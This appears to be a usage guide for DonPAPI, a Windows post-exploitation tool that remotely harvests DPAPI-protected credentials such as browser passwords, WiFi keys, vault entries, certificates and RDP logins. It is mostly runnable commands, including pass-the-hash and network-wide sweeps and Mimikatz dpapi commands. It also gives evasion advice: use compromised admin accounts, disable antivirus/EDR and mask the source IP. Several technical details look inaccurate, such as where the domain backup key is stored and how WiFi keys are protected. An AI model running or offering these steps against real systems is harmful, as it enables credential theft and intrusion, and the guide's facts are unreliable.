DonPAPI

DonPAPI is a post-exploitation framework for remotely harvesting Windows credentials and secrets via DPAPI without touching LSASS. It extracts browser passwords, WiFi keys, vault credentials, and certificates from target machines over the network.

Installation

Install from PyPI:

pip install donpapi

Install from source:

git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
pip install -r requirements.txt
python donpapi.py --help

Requires Python 3.8+, Impacket, and Windows domain credentials for remote access.

Quick Start

Basic usage with password authentication:

donpapi -d DOMAIN -u USERNAME -p PASSWORD 192.168.1.100

Single IP with domain admin account:

donpapi -d contoso.com -u admin -p 'P@ssw0rd!' 10.0.0.50

Against multiple targets:

donpapi -d domain.com -u user -p pass 10.0.0.0/24

Authentication Methods

Password Authentication

donpapi -d DOMAIN -u USERNAME -p PASSWORD TARGET
donpapi -d corp -u jdoe -p 'MyPassword123!' 192.168.1.100

NTLM Hash (Pass-the-Hash)

donpapi -d DOMAIN -u USERNAME -H NTHASH TARGET
donpapi -d corp -u admin -H 8846f7eaee8fb117ad06bdd830b7586c 10.0.0.50

Kerberos Authentication

donpapi -d DOMAIN -u USERNAME -k TARGET
export KRB5CCNAME=/tmp/user.ccache
donpapi -d corp -u jdoe -k 192.168.1.100

AES Key Authentication

donpapi -d DOMAIN -u USERNAME -aesKey AESKEY TARGET
donpapi -d corp -u user -aesKey abc123def456... 10.0.0.100

Current Session (LUID/Session Token)

donpapi -luid TOKEN TARGET
donpapi -luid 0x12345:0x6789abc 192.168.1.100

Target Specification

Single IP Address

donpapi -d domain.com -u admin -p pass 192.168.1.100

CIDR Range

donpapi -d domain.com -u admin -p pass 192.168.1.0/24
donpapi -d domain.com -u admin -p pass 10.0.0.0/16

Targets from File

donpapi -d domain.com -u admin -p pass -tf targets.txt

targets.txt format (one per line):

192.168.1.100
192.168.1.101
192.168.1.102
10.0.0.50

Target IP Override

donpapi -d domain.com -u admin -p pass --target-ip 192.168.1.100 hostname

What It Collects

Browser Credentials

Extracts cached passwords and stored credentials from:

# Chrome/Chromium passwords and saved autofill
# Microsoft Edge passwords and autofill
# Firefox passwords (if encrypted with DPAPI)
# Opera, Brave, and other Chromium-based browsers

Browser	Passwords	Cookies	Autofill	Bookmarks
Chrome	Yes	Yes	Yes	No
Edge	Yes	Yes	Yes	No
Firefox	Yes	No	No	No
Opera	Yes	Yes	Yes	No
Brave	Yes	Yes	Yes	No

WiFi Passwords

Recovers stored wireless network credentials:

# All SSID names and pre-shared keys (PSK)
# Connection profiles with DPAPI encryption
# Requires domain backup key for decryption

Windows Vault Credentials

Extracts stored credentials from Windows Credential Manager:

# Generic credentials (username/password pairs)
# Domain credentials
# Certificate-based credentials
# Session cookies

Certificate Data

Harvests certificate-related secrets:

# Private keys
# Client certificates
# Server certificates
# Certificate thumbprints

RDP Connection History

Retrieves Remote Desktop credentials:

# Saved RDP connection passwords
# Connection metadata
# Server information

Scheduled Task Credentials

Extracts credentials from scheduled tasks:

# Task-embedded usernames and passwords
# Run-as credentials
# Service account details

Collection Methods

Registry Access Over SMB

# HKEY_CURRENT_USER registry hives remotely
# HKEY_LOCAL_MACHINE sensitive locations
# No local execution required
# SAM/SECURITY/SYSTEM hives for hash extraction

Protected File Retrieval

# Copies protected files via SMB
# Browser database files
# Vault credential stores
# DPAPI protected files

Stealthy vs. Mimikatz

DonPAPI advantages over Mimikatz:

# No LSASS memory access required
# No code injection needed
# No process creation on target
# Remote execution only
# No antivirus hooks on LSASS
# Recoverable from disk artifacts
# Minimal memory footprint

Output and Reporting

Specify Output Directory

donpapi -d domain.com -u admin -p pass -o /tmp/output 192.168.1.100

Output Structure

output/
├── 192.168.1.100/
│   ├── Browser Credentials/
│   │   ├── chrome_passwords.txt
│   │   ├── edge_passwords.txt
│   │   └── firefox_logins.json
│   ├── Wifi/
│   │   └── wifi_passwords.txt
│   ├── Windows Vault/
│   │   └── vault_credentials.txt
│   ├── Windows Certificates/
│   │   └── certificates.pem
│   ├── RDP/
│   │   └── rdp_credentials.txt
│   └── report.html

HTML Report

Automatically generated summary:

# Visual dashboard of recovered credentials
# Target overview and collection summary
# Credentials grouped by type
# Timeline of collection
# Export-ready formats

Database Export

# SQLite database with all findings
# Searchable credential repository
# Machine-readable format
# Integration with credential managers

Filtering Options

Exclude Browser Credentials

donpapi -d domain.com -u admin -p pass --no-browser 192.168.1.100

Exclude VNC Credentials

donpapi -d domain.com -u admin -p pass --no-vnc 192.168.1.100

Exclude WiFi Passwords

donpapi -d domain.com -u admin -p pass --no-wifi 192.168.1.100

Exclude Sysadmin Accounts

donpapi -d domain.com -u admin -p pass --no-sysadmins 192.168.1.100

Selective Collection

donpapi -d domain.com -u admin -p pass --filter browsers,wifi,vault 192.168.1.100
donpapi -d domain.com -u admin -p pass --filter certificates,rdp 192.168.1.100

Combined Filtering

donpapi -d domain.com -u admin -p pass --no-browser --no-vnc --filter vault,wifi 10.0.0.0/24

DPAPI Explained

Windows DPAPI Overview

DPAPI (Data Protection API) is Windows’ built-in encryption mechanism:

# User-level keys: encrypted with user password
# Machine-level keys: encrypted with SYSTEM
# Domain backup key: allows domain admin decryption
# Master keys stored in user's profile

DPAPI Master Keys

Location and structure:

# User keys: C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect\{SID}
# System keys: C:\Windows\System32\Microsoft\Protect\S-1-5-18
# Multiple master keys per user (created periodically)
# Protected by user's logon password

Domain Backup Key Recovery

# Domain admins can extract domain backup key
# Allows decryption of all domain user DPAPI secrets
# Stored in AD (msDS-KeyCredentialLink, etc.)
# Enables offline credential recovery

Advanced Options

Provide Domain Backup Key

donpapi -d domain.com -u admin -p pass --pvk domain_backup.pvk 192.168.1.100

Specify Domain Controller IP

donpapi -d domain.com -u admin -p pass --dc-ip 10.0.0.10 192.168.1.100

Custom Target IP

donpapi -d domain.com -u admin -p pass --target-ip 10.0.0.100 WORKSTATION01

Port Specification

donpapi -d domain.com -u admin -p pass -ports 445,3389 192.168.1.100
donpapi -d domain.com -u admin -p pass --port 445 192.168.1.0/24

Multithreaded Collection

donpapi -d domain.com -u admin -p pass --threads 10 192.168.1.0/24

Verbose Logging

donpapi -d domain.com -u admin -p pass -v 192.168.1.100
donpapi -d domain.com -u admin -p pass -vv 192.168.1.100

Troubleshooting

Connection Refused

Check network connectivity and firewall:

# Verify SMB port 445 is open
# Confirm credentials are valid
# Check firewall rules on target
# Ensure target is reachable

Access Denied

Verify authentication credentials:

# Confirm username and password
# Check user has administrative rights
# Verify domain name is correct
# Test with different credential type (hash vs. password)

No Credentials Found

Target may have limited secrets stored:

# User may not have browser passwords saved
# WiFi passwords only stored for currently connected network
# Check --no-* filters aren't excluding data
# Verify user has logged in and cached credentials

DPAPI Decryption Fails

Cannot decrypt without proper keys:

# Domain backup key not available
# User password not correct
# DPAPI masterkey file corrupted
# Try with domain admin account for better access

SMB Enumeration Timeout

Increase timeout for slow networks:

donpapi -d domain.com -u admin -p pass --timeout 30 192.168.1.100

Best Practices

Operational Security

# Use domain admin or compromised admin account
# Filter unnecessary data collections (--no-browser if not needed)
# Disable antivirus/EDR temporarily if possible
# Run against specific targets, not blind scans
# Clean up output files after collection
# Use VPN/proxy to mask source IP

Collection Strategy

# Target high-value systems first (servers, admin workstations)
# Prioritize domain controllers for backup key extraction
# Focus on service accounts with stored credentials
# Combine with credential validation tools
# Document all collected credentials safely

Credential Validation

After collection, validate credentials:

# Test RDP credentials against target
# Verify domain account access
# Check WiFi connectivity
# Authenticate to discovered systems
# Prioritize credentials by privilege level

Safe Storage

Protect harvested credentials:

# Store output directory on encrypted volume
# Restrict access to findings
# Use separate reporting machine
# Archive securely for cleanup
# Document chain of custody

Mimikatz DPAPI Modules

Extract DPAPI secrets with Mimikatz:

mimikatz.exe "dpapi::cred /in:C:\Users\user\AppData\Roaming\..."
mimikatz.exe "dpapi::masterkey /in:masterkey_file"
mimikatz.exe "dpapi::cache" # List cached DPAPI data

SharpDPAPI

C# DPAPI extraction tool:

# Windows-native DPAPI exploitation
# Chromium-based browser password extraction
# Vault credential recovery
# RDP connection harvesting

Impacket dpapi.py

Python DPAPI utilities:

# Masterkey file parsing
# DPAPI secret decryption
# Domain backup key operations
# Cryptographic key extraction

LaZagne

Multi-platform credential recovery:

# Browser password extraction
# VPN credential harvesting
# Mail client password recovery
# SSH key enumeration

Other Credential Tools

Tool	Purpose	Stealth
Mimikatz	In-memory credential dumping	Low
procdump + pypykatz	Indirect LSASS dumping	Medium
Nirsoft tools	Cached credential recovery	Medium
SafetyKatz	Obfuscated Mimikatz variant	Medium
Credentials.ps1	PowerShell credential module	High